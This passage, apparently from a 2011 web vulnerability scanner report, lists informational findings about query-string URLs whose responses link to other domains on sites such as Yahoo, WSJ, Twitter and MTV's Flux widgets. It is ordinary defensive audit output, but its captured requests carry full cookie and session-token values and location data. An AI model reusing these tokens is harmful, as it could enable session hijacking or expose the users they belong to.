MYTCK=AgBN9fAQAEmQECplqhAOW0IQHCspECpQJxAAS18QAFflEBx9uBAqSeoQDjXfEBxMJRAALUcQHG8IEA57PxAqO7o%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:11:21 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 7113

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128qsh2pe(gid$pCn7imKL8NLm3NorTdAdCwBurcHW8032GokAA_Py,st$1307974281258507,v$1.0))&t=J-D"></noscript>
...[SNIP]...
18.45. http://my.yahoo.com/darla/fc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.yahoo.com
Path:   /darla/fc.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /darla/fc.php?cb=YAHOO.ads.darla._loaded&p=my&f=150001785&l=RQ&en=utf-8&npv=1&rn=1307974282577 HTTP/1.1
Host: my.yahoo.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh; myc=d=un3qpyo8OKG8Zlb4ckLdwXEz_01QrIULZYAJ2LRN8azJboqV7W6jRe8PMkWIB5WVpfGo0KHAdnWnVeCbiL5LTYlyzQiBbbTXgp2XjFniMsExNtuj_uZKSDfQbDDV2yrwKhKamUiZDW_8PN.RlQJY0mVjjdmF6FQWezl0xP4B_7C.zS68gqDgkcNseFdbOoJg_6pJ0P0aWJKmsuPdPQtVjRKelIKJsdV_yeEH5izEtOQMfK_QRAbA.6mQsWtnknm4v0LiIvfpsJodDAAmnX96HhB2a2PU9xNkdYsHx08Q7Iyo5cFvgsoSoyfz0kho_HOc5PzCtL5fQuHnixw0yaWVqXzwmprh8ep0&v=2; myc_s=d=cBa1s.500qJTZNubvsVqIwmDOX3Ot9CBpA7wNjPY4LtYQDYnOneU0AAdjgLGuOn9bfCFnFD71Ynokl3QKYaeg.KjNBZZCsWlLyPnvYNXziPQC2L1KSX2Eix8n5CdVzlFcrBdTqYXU.W_9agQiGPw6cCcApIX1ShDPTIp1l2Oegp9DJ9x4i.VfYjiOS3Wj7CQ5SlgPldzHw5JCY6qvvKhmO4Bk6MGWNEdY4gDAkpAIcXhryA0mmue1eS7g_KheES6DWNEiTC5Q8jMldqZTvHFtg1T6PwgIOyCiJXGxRkL.kP365o21.799Doz.QZ6wqUSLdgAR5v2qg8Klw7DBuRsebKj8ETpo.jRvM0vWOK7JKcEG0CWZ3.0E0WXpw1wcLU4N_K30WHT24Q3rbVSQAqOQcdQ3_0KBth3f4QmXtrScY8yRkYi_y4xTqsIxZ0XsgLLR7nTZSL_dbvE9NzBCREpMYCtVBLj3VhOfB7DYGzVYVXPUCT025joRZAE2OS3WQLUDdyb57IjLDQiQ0PGiLty3vwQyWVkHoglJ7wh3Ss2X0Waq1kJ7cr986TPvhruPZpw8irEmZS.piNAn5P.yTMsCM7O2zGP8c6Mc.CnsnVG9i8MliONQjcBKjBRa_IUHmbYyrVTg08slSkRzIIm0vordSiKFkztO643ZBIEa2pbQvm1L8PVTmzUfGogu2MsUKzFQegns2IhGpnmt7zaz5ou&v=2; MYTMI=8; MYTCK=AgBN9fAQAEmQECplqhAOW0IQHCspECpQJxAAS18QAFflEBx9uBAqSeoQDjXfEBxMJRAALUcQHG8IEA57PxAqO7o%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:11:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 6435

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128ksagmv(gid$bC9ZKmKL8NLm3NorTdAdCxM0rcHW8032GosAA2uT,st$1307974283225540,v$1.0))&t=J-D"></noscript>
...[SNIP]...
18.46. http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052702304665904576383880754844512.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D1; s_cc=true; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_Tech_0_0_WP_2200%2526pidt%253D1%2526oid%253Dhttp%25253A//online.wsj.com/article/SB10001424052702304665904576383880754844512.html%25253Fmod%25253DWSJ_Tech_LEADTop%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:14:01 GMT
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep06 - Mon 06/13/11 - 18:23:34 EDT
Cache-Control: max-age=15
Expires: Tue, 14 Jun 2011 00:14:16 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 134684
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<li class="hat_tab" id="hat_tab2">
<a onclick="hat.track('MW')" href="http://www.marketwatch.com" id="hat_link2"></a>
...[SNIP]...
<li class="hat_tab" id="hat_tab3">
<a onclick="hat.track('BOL')" href="http://online.barrons.com/home" id="hat_link3"></a>
...[SNIP]...
<li class="hat_tab" id="hat_tab4">
<a onclick="hat.track('ATD')" href="http://allthingsd.com" id="hat_link4"></a>
...[SNIP]...
<li class="hat_tab" id="hat_tab6">
<a onclick="hat.track('FINS')" href="http://www.fins.com" id="hat_link5"></a>
...[SNIP]...
<li class="hat_tab" id="hat_tab7">
<a onclick="hat.track('SM')" href="http://www.smartmoney.com" id="hat_link6"></a>
...[SNIP]...
<li class="hat_drop_item" id="hat_more0"><a href="http://bigcharts.marketwatch.com/">Big Charts</a>
...[SNIP]...
<li class="hat_drop_item" id="hat_more1"><a href="http://vse.marketwatch.com/Game/Homepage.aspx">Virtual Stock Exchange</a>
...[SNIP]...
<li class="hat_drop_item" id="hat_more8"><a href="http://www.wsjradio.com">WSJ Radio</a>
...[SNIP]...
<li class="hat_drop_item" id="hat_more9"><a href="http://www.efinancialnews.com/">Financial News</a>
...[SNIP]...
<li class="hat_drop_item lifestyleItem" id="hat_more11"><a href="http://www.wsjwine.com/">WSJ<span>
...[SNIP]...
<li class=" ">

   <a href="http://allthingsd.com/" class="linklist_link">All Things Digital</a>
...[SNIP]...
your personal, non-commercial use only. To order presentation-ready copies for distribution to your colleagues, clients or customers, use the Order Reprints tool at the bottom of any article or visit
<a class="firstLink" href="http://www.djreprints.com" target="_blank">www.djreprints.com</a>
...[SNIP]...
<noscript>
   <img src="http://ad.doubleclick.net/activity;src=490793;type=healt926;cat=snipp989;ord=1?" width="1" height="1" border="0" alt=""/>
</noscript>
<!-- cs=1 -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=wsj_snippet_cs=1&betq=4544=381370" width="1" height="1" border="0" alt=""/>
<!-- cs=2 -->
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=wsj_snippet_cs=2&betq=4544=381371" width="1" height="1" border="0" alt=""/>
<div class="articleHeadlineBox headlineType-newswire">
...[SNIP]...
</script>
<script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js">
</script>
...[SNIP]...
<p><a href="http://www.djreprints.com">www.djreprints.com</a>
...[SNIP]...
<h2><a rel="nofollow" class="yahoo" target="_blank" href="http://finance.yahoo.com" title="[Back to Yahoo! Finance]">Back To </a>
...[SNIP]...
<li><a rel="nofollow" class="msn" target="_blank" href="http://moneycentral.msn.com/" title="[Back to MSN Money]"></a></li>
   <li><h2><a rel="nofollow" target="_blank" href="http://moneycentral.msn.com/">MSN Money Homepage</a>
...[SNIP]...
<h2><a rel="nofollow" target="_blank" href="http://moneycentral.msn.com/investor/home.asp">MSN Money Investing</a>
...[SNIP]...
</div>
<a rel="entry-content" href="http://ie8.smoothfusion.com/WallStreetJournal/view.aspx">LINKS TO ACTUAL PAGE CONTAINING WEB SLICE FUNCTIONALITY.</a>
<a rel="bookmark" target="_blank" href="http://www.wallstreetjournal.com" ></a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.djreprints.com/?mod=WSJ_footer">Reprints</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.wsjdigital.com/?mod=WSJ_footer">Advertising</a>
...[SNIP]...
<li><a href="http://www.wsjlocal.com/?mod=WSJ_footer" rel="nofollow">Advertise Locally</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.dj.com/?mod=WSJ_footer">About Dow Jones</a>
...[SNIP]...
<li><a href="http://www.dowjones.com/careers.asp?mod=WSJ_footer" rel="nofollow">Jobs at WSJ.com</a>
...[SNIP]...
<li id="futureLeadProgLink" style="display:none;"><a href="http://www.wsj-asia.com/flp/about.html?mod=WSJ_footer" rel="nofollow">Future Leadership Program</a>
...[SNIP]...
<li><a href="https://www.wsjsafehouse.com/">SafeHouse - Send Us Information</a>
...[SNIP]...
<li><a class="icon_facebook" href="http://www.facebook.com/wsj" target="_blank">WSJ on Facebook</a>
...[SNIP]...
<li><a href="http://wsj.iamplify.com/?mod=WSJ_footer">WSJ Digital Downloads</a>
...[SNIP]...
<li><a href="http://www.marketwatch.com/?siteid=wsj&dist=freedjsiteslink&mod=WSJ_footer">Marketwatch.com</a>
...[SNIP]...
<li><a href="http://online.barrons.com/public/main?mod=WSJ_footer">Barrons.com</a>
...[SNIP]...
<li><a href="http://www.smartmoney.com/?mod=WSJ_footer">SmartMoney.com</a>
...[SNIP]...
<li><a href="http://allthingsd.com/?reflink=DNH_EUR&mod=WSJ_footer">AllThingsD.com</a>
...[SNIP]...
<li class="fins"><a href="http://www.fins.com/?mod=WSJ_footer">FINS:</a> <a href="http://www.fins.com/finance/?mod=WSJ_footer">Finance,</a> <a href="http://it-jobs.fins.com/?mod=WSJ_footer">IT jobs,</a> <a href="http://sales-jobs.fins.com/?mod=WSJ_footer">Sales jobs</a>
...[SNIP]...
<li><a href="http://bigcharts.marketwatch.com/?mod=WSJ_footer">BigCharts.com</a>
...[SNIP]...
<li><a href="http://vse.marketwatch.com/Game/Homepage.aspx?mod=WSJ_footer">Virtual Stock Exchange</a>
...[SNIP]...
<li><a rel="nofollow" href="http://wsjradio.com?mod=WSJ_footer">WSJ Radio</a>
...[SNIP]...
<small class="acapLogo"><a href="http://the-acap.org/acap-enabled.php?mod=WSJ_footer" target="_blank"><span>
...[SNIP]...
</script>
<script type="text/javascript" src="http://stags.peer39.net/712/trg_712.js"></script>
...[SNIP]...
18.47. http://platform.twitter.com/widgets/follow_button.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.twitter.com
Path:   /widgets/follow_button.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /widgets/follow_button.html?screen_name=WSJ&show_count=false&show_screen_name=true HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 03 Jun 2011 23:19:47 GMT
ETag: "316d5be7b9bf187a7b426f66963a909a"
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 30500
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Date: Tue, 14 Jun 2011 00:13:51 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html><html><head><meta charset="utf-8"><title>Twitter For Websites: Follow Button</title><link rel="profile" href="http://microformats.org/profile/hcard"><style type="text/css">html{margin:0
...[SNIP]...
18.48. http://platform0.twitter.com/widgets/follow_button.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform0.twitter.com
Path:   /widgets/follow_button.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /widgets/follow_button.html?_=1306352834909&button=blue&id=twitter_tweet_button_0&lang=en&link_color=&screen_name=mtv&show_count=false&show_screen_name=false&text_color= HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 03 Jun 2011 23:19:47 GMT
ETag: "316d5be7b9bf187a7b426f66963a909a"
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 30500
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Date: Tue, 14 Jun 2011 00:16:15 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html><html><head><meta charset="utf-8"><title>Twitter For Websites: Follow Button</title><link rel="profile" href="http://microformats.org/profile/hcard"><style type="text/css">html{margin:0
...[SNIP]...
18.49. http://s0.videopress.com/js/videopress.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.videopress.com
Path:   /js/videopress.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /js/videopress.js?ver=1.03 HTTP/1.1
Host: s0.videopress.com
Proxy-Connection: keep-alive
Referer: http://videopress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Type: application/x-javascript
Date: Tue, 14 Jun 2011 00:32:01 GMT
Expires: Wed, 13 Jun 2012 00:32:01 GMT
Last-Modified: Thu, 26 May 2011 16:28:35 GMT
Server: ECS (dca/533A)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 10683

jQuery.extend({VideoPress:{error:{messages:{age:"You are of insufficient age to view this video.",error:"Unable to download and play video",flash:"Error loading Flash on your system",freedom:'You do not have sufficient <a href="http://www.gnu.org/philosophy/free-sw.html">Freedom levels</a> to view this video.',incompatible:'VideoPress requires either HTML5 video or <a href="http://www.adobe.com/go/getflashplayer">Adobe Flash Player 10</a>
...[SNIP]...
18.50. http://s2.wp.com/wp-content/mu-plugins/sharing/sharing.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s2.wp.com
Path:   /wp-content/mu-plugins/sharing/sharing.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /wp-content/mu-plugins/sharing/sharing.js?m=1306159269g&ver=0.2 HTTP/1.1
Host: s2.wp.com
Proxy-Connection: keep-alive
Referer: http://videopress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Type: application/x-javascript
Date: Tue, 14 Jun 2011 00:32:37 GMT
Expires: Wed, 13 Jun 2012 00:32:37 GMT
Last-Modified: Thu, 02 Jun 2011 22:28:54 GMT
Server: ECS (dca/53EE)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 31917

(function($){$.fn.extend({share_is_email:function(value){return/^((([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0-\uD7FF\uF900-\uFDCF\uFDF0-\uFFEF])+(\.([a-z]|\d|[!#\$%&'\*\+\-\/=\?\^_`{\|}~]|[\u00A0
...[SNIP]...
udioCaptchaHtml:function(){var a=Recaptcha,b=RecaptchaState,c=b.server+"image?c="+b.challenge;if(c.indexOf("https://")==0)c="http://"+c.substring(8);b=b.server+"/img/audiocaptcha.swf?v2";a=a._is_ie()?'<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="audiocaptcha" width="0" height="0" codebase="https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"><param name="movie" value="'+b+'" />
...[SNIP]...
18.51. http://static0.fluxstatic.com/-/Clients/Common/JS/Common/Overlay.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static0.fluxstatic.com
Path:   /-/Clients/Common/JS/Common/Overlay.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /-/Clients/Common/JS/Common/Overlay.js?7724a69c HTTP/1.1
Host: static0.fluxstatic.com
Proxy-Connection: keep-alive
Referer: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 37050
Content-Type: application/x-javascript
Last-Modified: Mon, 23 May 2011 07:10:46 GMT
Accept-Ranges: bytes
ETag: "9e436c891819cc1:400"
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=727130
Date: Tue, 14 Jun 2011 00:28:27 GMT
Connection: close

/**
* @description Overlay & Overlay.Window classes
* @requires Prototype & ScriptAculoUs.js
*/

window.debuggingMode = false;
function assert(condition, message) {
   if (window.debuggingMode
...[SNIP]...
<div class="btnHolder" style="border-top: 1px #ffffff solid;"><a href="http://www.flux.com"><img src="http://static1.fluxstatic.com/-/Clients/Flux/Img/Logo/flux_small.gif" alt="flux" width="43" height="11" />
...[SNIP]...
18.52. http://us.havaianas.com/front/templates/fragments/recently-viewed.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.havaianas.com
Path:   /front/templates/fragments/recently-viewed.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /front/templates/fragments/recently-viewed.jsp?t=1307987157119 HTTP/1.1
Host: us.havaianas.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://us.havaianas.com/MYOH.html
Cookie: __utmx=239515655.; __utmxx=239515655.; ysm_CK1RMTCHKGUVVQGSVMHDL0GUDIQS0=ysm_PV1RMTCHKGUVVQGSVMHDL0GUDIQS0:1&ysm_SN1RMTCHKGUVVQGSVMHDL0GUDIQS0:1307987156272&ysm_LD1RMTCHKGUVVQGSVMHDL0GUDIQS0:0; __utma=239515655.844996946.1307987156.1307987156.1307987156.1; __utmb=239515655.1.10.1307987156; __utmc=239515655; __utmz=239515655.1307987156.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmv=239515655.|1=EndVis=1307987156=1,

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:56:29 GMT
Server: Apache
Content-Length: 1211
Content-Type: text/html;charset=ISO-8859-1


<div class="sidebox viewed clear">
   <h2 class="heading">Most Popular</h2>
<ul>

<li>

<a href="/womens-sandals/slim-turkish.html?s=15365&from=recently" onClick="javascript: pageTracker._trackPageview('http://www.havaianasus.com/recentlyReviewedFeature');" >
<img alt="" class="product tinyproduct" src="https://d3vnak9c16q2tf.cloudfront.net/items/HavaianasWomens-Havaianas41197202990356_small_CART_37370.png"/>
</a>
...[SNIP]...
<a href="/mens-sandals/urban.html?s=15663&from=recently" onClick="javascript: pageTracker._trackPageview('http://www.havaianasus.com/recentlyReviewedFeature');" >
<img alt="" class="product tinyproduct" src="https://d3vnak9c16q2tf.cloudfront.net/items/HavaianasMens-Havaianas41200480555390_small_CART_38129.png"/>
</a>
...[SNIP]...
18.53. http://widgets.flux.com/-/GetAuthCookie.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.flux.com
Path:   /-/GetAuthCookie.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /-/GetAuthCookie.ashx?returnUrl=http%3a%2f%2fcommunity.mtv.com%2fOverlays%2fLogIn.aspx%3fcallbackName%3dF13080112537492%26fluxHosted%3dfalse%26fbAutoLoginDisabled%3dtrue%26domain%3dwww.mtv.com HTTP/1.1
Host: widgets.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112537492&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com&authCookie=
Server: Microsoft-IIS/7.0
Server: w04g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Date: Tue, 14 Jun 2011 00:27:33 GMT
Content-Length: 279

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112537492&amp;fluxHosted=false&amp;fbAutoLoginDisabled=true&amp;domain=www.mtv.com&amp;authCookie=">here</a>
...[SNIP]...
18.54. http://widgets.flux.com/-/GetAuthCookie.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.flux.com
Path:   /-/GetAuthCookie.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /-/GetAuthCookie.ashx?returnUrl=http%3a%2f%2fcommunity.mtv.com%2fOverlays%2fLogIn.aspx%3fcallbackName%3dF13080112111260%26fluxHosted%3dfalse%26fbAutoLoginDisabled%3dtrue%26domain%3dwww.mtv.com HTTP/1.1
Host: widgets.flux.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTUID=BD68167B-8714-4A0A-8544-E6985A15524C

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&fluxHosted=false&fbAutoLoginDisabled=true&domain=www.mtv.com&authCookie=
Server: Microsoft-IIS/7.0
Server: w10g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Date: Tue, 14 Jun 2011 00:27:49 GMT
Content-Length: 279

<html><head><title>Object moved</title></head><body>
